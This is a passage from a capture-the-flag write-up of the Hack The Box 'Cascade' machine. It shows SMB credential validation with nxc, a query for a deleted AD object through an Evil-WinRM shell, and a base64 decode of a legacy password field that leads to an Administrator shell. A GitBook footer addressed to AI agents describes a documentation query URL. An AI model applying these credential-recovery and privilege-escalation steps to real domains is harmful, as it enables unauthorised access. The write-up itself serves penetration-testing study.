──(ajay㉿kali)-[~]
└─$ python3 decrypt.py
w3lc0meFr31nd
                                                                                                                                                                                                                                            
```

```powershell
──(ajay㉿kali)-[~]
└─$ nxc smb 10.129.19.142 -u Arksvc -p 'w3lc0meFr31nd'
SMB         10.129.19.142   445    CASC-DC1         [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.19.142   445    CASC-DC1         [+] cascade.local\Arksvc:w3lc0meFr31nd 
```

## Shell as Arsksvc

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FWiyC5oCs5FcbmJVGkHuk%2Fimage.png?alt=media&amp;token=a94db579-7c0b-4537-9950-d825677cfa61" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FwzlBYKH6DVVDXPxoGi3A%2Fimage.png?alt=media&amp;token=dad95ee2-6482-4ed5-9b19-2bd07395ce44" alt=""><figcaption></figcaption></figure>

Arksvc is part of AD Recycle bin which means we can check if can restore the deleted user TempAdmin.

```powershell
*Evil-WinRM* PS C:\Users\arksvc> Get-ADObject -Filter {SamAccountName -eq "TempAdmin"} -IncludeDeletedObjects -Properties *

accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage                        : 0
countryCode                     : 0
Created                         : 1/27/2020 3:23:08 AM
createTimeStamp                 : 1/27/2020 3:23:08 AM
Deleted                         : True
Description                     :
DisplayName                     : TempAdmin
DistinguishedName               : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData           : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName                       : TempAdmin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 1/27/2020 3:24:34 AM
modifyTimeStamp                 : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN               : TempAdmin
Name                            : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid                       : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 132245689883479503
sAMAccountName                  : TempAdmin
sDRightsEffective               : 0
userAccountControl              : 66048
userPrincipalName               : TempAdmin@cascade.local
uSNChanged                      : 237705
uSNCreated                      : 237695
whenChanged                     : 1/27/2020 3:24:34 AM
whenCreated                     : 1/27/2020 3:23:08 AM

```

I got another cascadeLegacyPWD : `YmFDVDNyMWFOMDBkbGVz`

Cant be restored as access denied. what i can do is as it is a backup account similar to Administrator i can decode this and use the password aganist the Administrator account to see if it works.

```powershell
┌──(ajay㉿kali)-[~]
└─$ echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d    
baCT3r1aN00dles                                                                                                                                                                                                                                            
```

## Shell as Administrator

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FaEGEeGF6iuvwbkuwmE70%2Fimage.png?alt=media&amp;token=8c3d09eb-c2e2-48b4-8299-a850053cd10a" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box/htb-cascade.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
